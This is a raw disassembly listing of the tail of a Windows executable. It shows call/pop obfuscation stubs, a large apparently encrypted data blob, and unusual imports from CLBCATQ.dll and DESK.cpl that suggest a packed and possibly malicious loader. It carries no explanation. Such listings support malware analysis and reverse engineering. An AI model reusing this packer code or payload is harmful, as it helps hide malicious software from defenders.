; =============== S U B	R O U T	I N E =======================================


sub_401E68	proc near		; CODE XREF: sub_401E44+17p
		pop	ecx
		call	ecx
		push	esi
		push	edi
		push	ecx
		call	sub_4016B0
		add	esp, 8
		pop	esi
		rep call sub_401E84
		mov	eax, ds:GetTickCount
		jmp	eax
sub_401E68	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_401E84	proc near		; CODE XREF: sub_401E68+Fp
		pop	ecx
		call	ecx
		add	esp, 4Ch
		pop	ebp
		retn	0
sub_401E84	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 92h dup(90h)

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401F20	proc near		; CODE XREF: sub_4015C4+Cp
		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 34h
		lea	edi, [esi-258h]
		sub	eax, edi
		mov	edx, 0
		push	edx
		rep call sub_401F43
		mov	eax, ds:SetEvent
		jmp	eax
sub_401F20	endp


; =============== S U B	R O U T	I N E =======================================


sub_401F43	proc near		; CODE XREF: sub_401F20+16p
		pop	ecx
		call	ecx
		push	edi
		push	ebx
		push	edx
		call	sub_401414
		add	esp, 8
		pop	edi
		rep call sub_401F5F
		mov	eax, ds:GetCommandLineW
		jmp	eax
sub_401F43	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_401F5F	proc near		; CODE XREF: sub_401F43+Fp
		pop	ecx
		call	ecx
		add	esp, 34h
		pop	ebp
		retn	0
sub_401F5F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 123h	dup(90h)
		dd 208EB5E0h, 5CC06A40h, 637F43BCh, 774DF255h, 98BE5D70h
		dd 0A60A6D22h, 811C2705h, 8D73EEBh, 494463FEh, 8304DB5Fh
		dd 732F3F28h, 88BC06BFh
		db 50h,	0E2h
word_4020BE	dw 0E250h		; DATA XREF: sub_4011C8+19o
		dd 15C616B5h, 779CF4A5h, 5207DF24h, 202769B3h, 45F00CAAh
		dd 0E185DC09h, 1DA606BFh, 72ACFCA0h, 2C9292EAh,	98E8E9F7h
		dd 0B4F7F768h, 260554A3h, 0F25E8079h, 5F5C96C2h, 520DF7A2h
		dd 0D7F954A7h, 0C0F955B0h, 2089480Fh, 0E546B8F8h, 0EDCB43Dh
		dd 6B7A52E1h, 54C2D692h, 4B8190FDh, 1C279AECh, 5A5B9EF6h
		dd 0C33395CDh, 74E5886Dh, 0B093C4D1h, 9AFC8597h, 7BEA2299h
		dd 17FB5018h, 7DD85747h, 0C5981AE5h, 5E1E0B51h,	5100FABFh
		dd 0DEA3EAA0h, 11180AAFh, 30450A7h, 7F9CDDA5h, 0CE01912Dh
		dd 98F9081Eh, 0BA2835F0h, 0C7DEE507h, 221A763Fh, 4D4FC4E0h
		dd 0B0FC5217h, 0A886D0DCh, 31F47F91h, 6010C037h, 5061A04Fh
		dd 0AF33A5D7h, 0B40E8313h, 266326C3h, 21CDC4F2h, 0C6EA6DABh
		dd 49E0C881h, 0B18EF317h, 0ABE26E8Ch, 7119C8B9h, 4EF7A8DFh
		dd 0EFC522F6h, 9F128E84h, 252B10F6h, 22430296h,	6F46831Fh
		dd 0C8DCBEA0h, 9BE4F120h, 0B01897C5h, 92480489h, 362F54BFh
		dd 4F3C61F6h, 0AF352607h, 24713C87h, 0ED2606B0h, 954508FDh
		dd 72267F4Fh, 0D20539E5h, 4E0C8364h, 51FCD28Fh,	0DECB4DC8h
		dd 25E1E47Bh, 0AF03CE47h, 0AE066067h, 9137448Ch, 38E4624Bh
		dd 0AB199765h, 2D691C71h, 0E1CE71C7h, 0A010C630h, 0B3041C72h
		dd 0B24E4DC1h, 78292BF3h, 0AE3DBB5Dh, 28387355h, 9F3CD2ABh
		dd 5BD4EE6Ah, 0C661142Ah, 2925758Fh, 0B370A690h, 8F798EE0h
		dd 39C3399Bh, 0E49EE51Ah, 8E18E572h, 0B8F38D86h, 2FDCA1B2h
		dd 0D1823B22h, 18BEE679h, 0A4D68C27h, 694B9ECh,	8C1E395h
		dd 54D81A76h, 0E19866DDh, 9BABB791h, 7CAD4843h,	0EA1AE71Ah
		dd 837C8375h, 5B32475Dh, 6928D3B7h, 0D860B624h,	14E84651h
		dd 0B616DCD7h, 0AD6D1AC4h, 92DDC89Ch, 0B7911E28h, 2E103A48h
		dd 4A140750h, 0DF33E4A8h, 923E0DABh, 0B9E151A2h, 0B304572Eh
		dd 0EE21D8F3h, 89EF378Ah, 3087643Ah, 9B0C5207h,	3E5A9ABCh
		dd 9D48B695h, 0B25C5B40h, 1D56D25Fh, 65D80A45h,	0D3A07969h
		dd 9A1A384Ah, 88F23BD5h, 0B1476719h, 7DDBA377h,	4DE87E44h
		dd 0CD8ED154h, 9F6695E1h, 5CC82ACFh, 0B06A768Fh, 921F1509h
		dd 3647C67Fh, 70322916h, 0D8A7707Bh, 0A4F2D352h, 8589CAE3h
		dd 0B27BA03Bh, 27C2D8FDh, 71141381h, 0CAF93ACCh, 9A8361BEh
		dd 27BD9FA0h, 42A04454h, 0BF9B88DEh, 0FA0A99F0h, 5A4C035Bh
		dd 0ABE65451h, 96A19C5Ah, 15729362h, 0E85289DAh, 0B7133116h
		dd 777B9BCAh, 0C557B62Ah, 2C5F24EAh, 6AD06E2Fh,	4B387F73h
		dd 0D168C046h, 984D23ECh, 27DC6E09h, 708A54A9h,	8C4626A6h
		dd 8A2F3DFDh, 3B50656Bh, 3AD7CD5Ah, 339901D6h, 671B837Fh
		dd 24F23E50h, 6EAAE559h, 48AA8D63h, 31A9C5A4h, 9504773Ah
		dd 414F8C8Eh, 0E3C20B81h, 4FD1FF28h, 82FDADD2h,	47F55917h
		dd 5D955299h, 59C957B3h, 61F54308h, 218982C0h, 20BA8EF2h
		dd 70B2B8EFh, 0B029FA88h, 0D8EA52C0h, 149AD707h, 0FA33EB7Ch
		dd 3F60A65h, 8BDAF9CDh,	159ED918h, 0FB08EBCDh, 0E47CFFE2h
		dd 15ACE0D1h, 83A77244h, 4A6F4A12h, 14BBE6DFh, 76A20CA1h
		dd 44AEE597h, 0DEC84734h, 0F283DC65h, 0DDBE11CCh, 92A0FED2h
		dd 0B6866896h, 7548CBB4h, 0FFFFCEB1h, 818018B0h, 3FBFBB8Fh
		dd 6C9EAE38h, 0C96F91AEh, 5CFC3728h, 0D94AA5BCh, 0A1FEB1E2h
		dd 0DCA4AB0Fh, 83236AFCh, 0FAE5D5DAh, 4D9089D7h, 8E439889h
		dd 39E8ECDFh, 79738990h, 53C63B37h, 0B5F2EF1Bh,	268F41C3h
		dd 72A05F1Eh, 20AFD070h, 0EFA797B0h, 2D20BE27h,	3BB30208h
		dd 1CC467BDh, 0F29DCC42h, 40E18E26h, 608F38EFh,	89E0D7D0h
		dd 0BC8F9438h, 0DBD8AA2Bh, 9393AAEEh, 70CE9ED0h, 0C898B0D8h
		dd 0D5C41BDBh, 969DF216h, 6EB97B3Ch, 0C9A342A2h, 27AED2F6h
		dd 4D6BF046h, 5B3A5D68h, 18CD633Eh, 0DCE6D9D9h,	0F10919Eh
		dd 7C6BB789h, 4D22993Ch, 1A7413A7h, 0B94F0BA1h,	2892CC6Bh
		dd 0D4B699CAh, 96A4B4C0h, 389DA8F9h, 9F79577Bh,	3E38ACB7h
		dd 64401EA7h, 9B0B4D29h, 0A7C3DEC7h, 60EEBDA7h,	5333FBEEh
		dd 0BAC805F2h, 26FCC068h, 0E181EC49h, 10CEF1EDh, 0F5238709h
		dd 7AEDC1CFh, 6671CA1Eh, 0AEC71AF1h, 0FE9BD34Ah, 0C8AA196h
		dd 3F45FBAAh, 0C92D527Bh, 9CF556C2h, 72DB53F1h,	0BF1DA660h
		dd 59D9D1C3h, 1C93171Eh, 12DAB8FAh, 3209C0Eh, 0FFEFB6B6h
		dd 992988A4h, 0BFEB3BADh, 89DB8E99h, 3C9E38B3h,	0A206E2F9h
		dd 3EB49B10h, 30310279h, 0DDB774Fh, 7AAAE5BDh, 83398D21h
		dd 9FA69A9Bh, 33CD9F33h, 0B013066h, 0AEFF67CFh,	1380B70Eh
		dd 9315A381h, 0A4A06CAh, 860F529Ah, 40147AF7h, 6080FEC4h
		dd 0D0BF815Eh, 1914FFD5h, 7348D45Bh, 8760CE28h,	3C237E61h
		dd 266F5925h, 0EDC85592h, 26C049BFh, 0D5009E81h, 16001D2Bh
		dd 237463D2h, 0E233367Bh, 8E3AC838h, 0F967A039h, 83203858h
		dd 0FF74E429h, 12FDB5Fh, 74567BB8h, 3D3B2A8Ah, 0B236DD2Bh
		dd 0AAECE769h, 1B14990Fh, 0B36007C9h, 26260385h, 0BD450A93h
		dd 0A947CB0Ah, 0AC0302D0h, 66897E97h, 0DF82C1D8h, 7BBE9F13h
		dd 0E794097Dh, 387C8688h, 14BB3B49h, 0A1FB0CC4h, 0AF2D3D4Eh
		dd 2C416DAEh, 2D4055EDh, 3FB0D462h, 61A834B7h, 153942A4h
		dd 0FAA3E21Eh, 13D25379h, 0F796D6A0h, 5B494AFh,	0FEA5B610h
		dd 3413E7F7h, 33B072FAh, 0CD552CDDh, 0A24A39C4h, 0BFDDD19Eh
		dd 8E7C1730h, 0BDC052F5h, 2D914C84h, 0A41D9434h, 0E27E7B36h
		dd 0F56E2882h, 0E63EBBF1h, 5613F3CAh, 4DB8315Ch, 0C5A65B56h
		dd 0A16D064Ch, 89C65F9Bh, 0A41A5BF5h, 2E5AD66Fh, 40D294D8h
		dd 3595B5FEh, 0E7A5B011h, 0DAE2CE3h, 62A5748Eh,	4FAD46BDh
		dd 2EA8AFF8h, 51AC1224h, 0D8A9F76Eh, 941507B2h,	0B65D7D90h
		dd 7C514137h, 0C3FBB563h, 9F832A12h, 94F2DF6h, 0D0D43A04h
		dd 0D42044A0h, 0CE3D2AB3h, 54BF3755h, 62C0EAEEh, 0C180ECD1h
		dd 5C9FA570h, 804B9A26h, 639B0789h, 3C8B1884h, 2BB88B6Bh
		dd 0D7EA3FF5h, 9893099Fh, 1A70223Bh, 8F07EFF9h,	1B79304h
		dd 0BF31FE60h, 34E9272Ch, 668C23A9h, 4DB9EE2Bh,	0DAA308EAh
		dd 93AE7B8Ah, 0B7A8C23Ah, 0A5AB9EE2h, 0AEAA308Eh, 0B7AAE7B8h
		dd 0FBAA8C23h, 87AAB9F2h, 2D91A306h, 0AEB78881h, 527DECA2h
		dd 0A885A049h, 2F7C2D6Dh, 20h dup(0)
		dd 200h	dup(?)
_text		ends

; Section 2. (virtual address 00003000)
; Virtual size			: 000B7000 ( 749568.)
; Section size in file		: 00000600 (   1536.)
; Offset to raw	data for section: 0004FC00
; Flags	C0000040: Data Readable	Writable
; Alignment	: default
;
; Imports from KERNEL32.dll
;
; ===========================================================================

; Segment type:	Pure data
; Segment permissions: Read/Write
_rdata		segment	para public 'DATA' use32
		assume cs:_rdata
		;org 403000h
; HMODULE __stdcall LoadLibraryW(LPCWSTR lpLibFileName)
LoadLibraryW	dd ?			; DATA XREF: sub_401180+34o
					; sub_401180+41r ...
; HMODULE __stdcall GetModuleHandleA(LPCSTR lpModuleName)
GetModuleHandleA dd ?			; DATA XREF: sub_401058+Fr
					; sub_401273+4o ...
; int __stdcall	lstrlenA(LPCSTR	lpString)
lstrlenA	dd ?			; DATA XREF: sub_401347+29r
					; sub_401468+1Cr ...
; DWORD	__stdcall GetConsoleTitleA(LPSTR lpConsoleTitle, DWORD nSize)
GetConsoleTitleA dd ?			; DATA XREF: start+Cr
; void __stdcall SetLastError(DWORD dwErrCode)
SetLastError	dd ?			; DATA XREF: sub_401080+1Dr
; LPWSTR __stdcall GetCommandLineW()
GetCommandLineW	dd ?			; DATA XREF: sub_40148B+22r
					; sub_401A24+2Br ...
; HANDLE __stdcall CreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags,	LPDWORD	lpThreadId)
CreateThread	dd ?
; BOOL __stdcall SetEvent(HANDLE hEvent)
SetEvent	dd ?			; DATA XREF: sub_401449+Dr
					; sub_4014F8+Br ...
; DWORD	__stdcall GetCurrentDirectoryA(DWORD nBufferLength, LPSTR lpBuffer)
GetCurrentDirectoryA dd	?
; BOOL __stdcall UnmapViewOfFile(LPCVOID lpBaseAddress)
UnmapViewOfFile	dd ?			; DATA XREF: sub_401B9E+21r
					; sub_401DC4+19r
; BOOL __stdcall CloseHandle(HANDLE hObject)
CloseHandle	dd ?			; DATA XREF: sub_4010FD+21r
					; sub_4018DC+1Br ...
; HANDLE __stdcall HeapCreate(DWORD flOptions, SIZE_T dwInitialSize, SIZE_T dwMaximumSize)
HeapCreate	dd ?
; HLOCAL __stdcall LocalFree(HLOCAL hMem)
LocalFree	dd ?			; DATA XREF: sub_4010A4+1Cr
					; sub_401154+1Br ...
; DWORD	__stdcall GetTickCount()
GetTickCount	dd ?			; DATA XREF: sub_401030+21r
					; sub_401414+2Er ...
; BOOL __stdcall PulseEvent(HANDLE hEvent)
PulseEvent	dd ?			; DATA XREF: sub_4010D4+22r
					; sub_401D34+1Dr
; void __stdcall GetSystemTime(LPSYSTEMTIME lpSystemTime)
GetSystemTime	dd ?
; BOOL __stdcall GetComputerNameA(LPSTR	lpBuffer, LPDWORD nSize)
GetComputerNameA dd ?
; BOOL __stdcall LocalUnlock(HLOCAL hMem)
LocalUnlock	dd ?			; DATA XREF: sub_401130+1Dr
					; sub_401238+34r ...
; HANDLE __stdcall CreateFileA(LPCSTR lpFileName, DWORD	dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes,	DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE	hTemplateFile)
CreateFileA	dd ?
; void __stdcall Sleep(DWORD dwMilliseconds)
Sleep		dd ?			; DATA XREF: sub_4018FE+22r
					; sub_401C34+2Er
		dd 0
;
; Imports from USER32.dll
;
; HWND __stdcall GetDlgItem(HWND hDlg, int nIDDlgItem)
GetDlgItem	dd ?
; BOOL __stdcall CheckRadioButton(HWND hDlg, int nIDFirstButton, int nIDLastButton, int	nIDCheckButton)
CheckRadioButton dd ?
; BOOL __stdcall IsWindow(HWND hWnd)
IsWindow	dd ?			; DATA XREF: sub_4011C8+5Cr
					; sub_401A7C+2Br
; BOOL __stdcall DrawEdge(HDC hdc, LPRECT qrc, UINT edge, UINT grfFlags)
DrawEdge	dd ?
; BOOL __stdcall DrawMenuBar(HWND hWnd)
DrawMenuBar	dd ?
; BOOL __stdcall GetScrollBarInfo(HWND hwnd, LONG idObject, PSCROLLBARINFO psbi)
GetScrollBarInfo dd ?
; HWND __stdcall CreateWindowExA(DWORD dwExStyle, LPCSTR lpClassName, LPCSTR lpWindowName, DWORD dwStyle, int X, int Y,	int nWidth, int	nHeight, HWND hWndParent, HMENU	hMenu, HINSTANCE hInstance, LPVOID lpParam)
CreateWindowExA	dd ?
; LRESULT __stdcall CallWindowProcA(WNDPROC lpPrevWndFunc, HWND	hWnd, UINT Msg,	WPARAM wParam, LPARAM lParam)
CallWindowProcA	dd ?
; SHORT	__stdcall GetKeyState(int nVirtKey)
GetKeyState	dd ?
; HDC __stdcall	GetDC(HWND hWnd)
GetDC		dd ?			; DATA XREF: sub_401320+20r
					; sub_40164E+1Dr ...
; int __stdcall	FillRect(HDC hDC, const	RECT *lprc, HBRUSH hbr)
FillRect	dd ?
; HWND __stdcall SetFocus(HWND hWnd)
SetFocus	dd ?			; DATA XREF: sub_4014C0+31r
					; sub_4015C4+21r ...
; LRESULT __stdcall DispatchMessageA(const MSG *lpMsg)
DispatchMessageA dd ?
		dd 0
;
; Imports from CLBCATQ.dll
;
DowngradeAPL	dd ?
SetupOpen	dd ?
UpdateFromAppChange dd ?
CheckMemoryGates dd ?
SetSetupOpen	dd ?
		dd 0
;
; Imports from DESK.cpl
;
InstallScreenSaver dd ?
		dd 0
		dd 3110h, 2 dup(0)
		dd 32F6h, 3000h, 3164h,	2 dup(0)
		dd 33C6h, 3054h, 319Ch,	2 dup(0)
		dd 3428h, 308Ch, 31B4h,	2 dup(0)
		dd 344Ah, 30A4h, 5 dup(0)
		dd 3254h, 3240h, 32D6h,	32C2h, 31BCh, 329Eh, 3274h, 3234h
		dd 3214h, 32B0h, 31DAh,	31E8h, 3284h, 31F6h, 3206h, 3264h
		dd 32E2h, 31CCh, 3290h,	322Ch, 0
		dd 337Ah, 3312h, 3326h,	335Ch, 3332h, 3348h, 33A0h, 3368h
		dd 3304h, 3340h, 3394h,	3388h, 33B2h, 0
		dd 33FCh, 341Ch, 33E6h,	33D2h, 340Ch, 0
		dd 3434h, 0
		db  74h	; t
		db 4, 53h, 65h
aTlasterror	db 'tLastError',0
		align 4
		db  4Fh	; O
		db 3, 4Ch, 6Fh
aCalunlock	db 'calUnlock',0
aT		db 'T',0
aClosehandle	db 'CloseHandle',0
		db 0F1h	; ñ
		db 4, 48h, 65h
aApcreate	db 'apCreate',0
		align 2
		dw 1C7h
aGettickcount	db 'GetTickCount',0
		align 2
		dw 39Bh
aPulseevent	db 'PulseEvent',0
		align 4
		db 0C0h	; À
		db 1, 47h, 65h
aTcurrentdirect	db 'tCurrentDirectoryA',0
		align 4
		dd 6C5304B3h, 706565h, 6553045Ah, 65764574h, 746Eh, 65470177h
		dd 646F4D74h, 48656C75h, 6C646E61h, 4165h, 6F4C033Dh, 694C6461h
		dd 72617262h, 5779h, 65470279h,	73795374h, 546D6574h, 656D69h
		dd 724300B7h, 65746165h, 65726854h, 6461h, 6F4C0349h, 466C6163h
		dd 656572h, 7243008Ah, 65746165h, 656C6946h, 1880041h
		dd 43746547h, 616D6D6Fh, 694C646Eh, 57656Eh, 6E5504D7h
		dd 5670616Dh, 4F776569h, 6C694666h, 1B70065h, 43746547h
		dd 6F736E6Fh, 6954656Ch, 41656C74h, 54E0000h, 7274736Ch
		dd 416E656Ch, 18E0000h,	43746547h, 75706D6Fh, 4E726574h
		dd 41656D61h, 454B0000h, 4C454E52h, 642E3233h, 6C6Ch, 65470722h
		dd 79654B74h, 74617453h, 6260065h, 63656843h, 6461526Bh
		dd 75426F69h, 6E6F7474h, 7C00000h, 69577349h, 776F646Eh
		dd 6AE0000h, 77617244h,	756E654Dh, 726142h, 65470706h
		dd 434474h
aYGetscrollbari	db 'Y',7,'GetScrollBarInfo',0
		align 4
		dd 724406A8h, 64457761h, 6567h,	614305FBh, 69576C6Ch, 776F646Eh
		dd 636F7250h, 70C0041h,	44746547h, 7449676Ch, 6D65h, 65530711h
		dd 636F4674h, 7375h, 694606DBh,	65526C6Ch, 7463h, 72430652h
		dd 65746165h, 646E6957h, 7845776Fh, 6930041h, 70736944h
		dd 68637461h, 7373654Dh, 41656761h, 53550000h, 32335245h
		dd 6C6C642Eh, 90000h, 63656843h, 6D654D6Bh, 4779726Fh
		dd 73657461h, 60000h
aUpdatefromappc	db 'UpdateFromAppChange',0
		db    4
		align 2
aDowngradeapl	db 'DowngradeAPL',0
		align 4
		db  1Dh
		align 2
aSetsetupopen	db 'SetSetupOpen',0
		align 4
		db  1Fh
		align 2
aSetupopen	db 'SetupOpen',0
aClbcatq_dll	db 'CLBCATQ.dll',0
		db    6
		align 2
aInstallscreens	db 'InstallScreenSaver',0
		align 2
aDesk_cpl	db 'DESK.cpl',0
		align 4
		dd 6Bh dup(0)
		dd 2DA80h dup(?)
_rdata		ends

; Section 3. (virtual address 000BA000)
; Virtual size			: 0000040A (   1034.)
; Section size in file		: 00000600 (   1536.)
; Offset to raw	data for section: 00050200
; Flags	C0000040: Data Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure data
; Segment permissions: Read/Write
_data		segment	para public 'DATA' use32
		assume cs:_data
		;org 4BA000h
		dd 20202020h
dword_4BA004	dd 0Bh dup(20202020h)	; DATA XREF: sub_401628+8o
dword_4BA030	dd 6 dup(20202020h)	; DATA XREF: sub_401A7C+8o
dword_4BA048	dd 8 dup(20202020h)	; DATA XREF: sub_401DC4+8o
asc_4BA068	db '                                                                 '
					; DATA XREF: sub_401130+8o
					; sub_401180+Co
		db '                                                                 '
		db '                      e',0
		db 'f',0
aSaduDll:
		unicode	0, <sadu*dll>,0
		align 4
		dd 0Ch dup(0)
dword_4BA148	dd 15h dup(0)		; DATA XREF: sub_4014C0+8o
dword_4BA19C	dd 0Ah dup(0)		; DATA XREF: sub_4017CC+8o
dword_4BA1C4	dd 0Dh dup(0)		; DATA XREF: sub_401320+8o
dword_4BA1F8	dd 2Bh dup(0)		; DATA XREF: sub_401B80+8o
dword_4BA2A4	dd 10h dup(0)		; DATA XREF: sub_401414+8o
dword_4BA2E4	dd 2Dh dup(0)		; DATA XREF: sub_4010D4+8o
dword_4BA398	dd 5 dup(0)		; DATA XREF: sub_401C34+8o
dword_4BA3AC	dd 0			; DATA XREF: sub_401238+8o
dword_4BA3B0	dd 10h dup(0)		; DATA XREF: sub_4015A4+8o
dword_4BA3F0	dd 0			; DATA XREF: sub_401ACC+8o
dword_4BA3F4	dd 83h dup(0)		; DATA XREF: sub_401A24+8o
		align 1000h
_data		ends


		end start
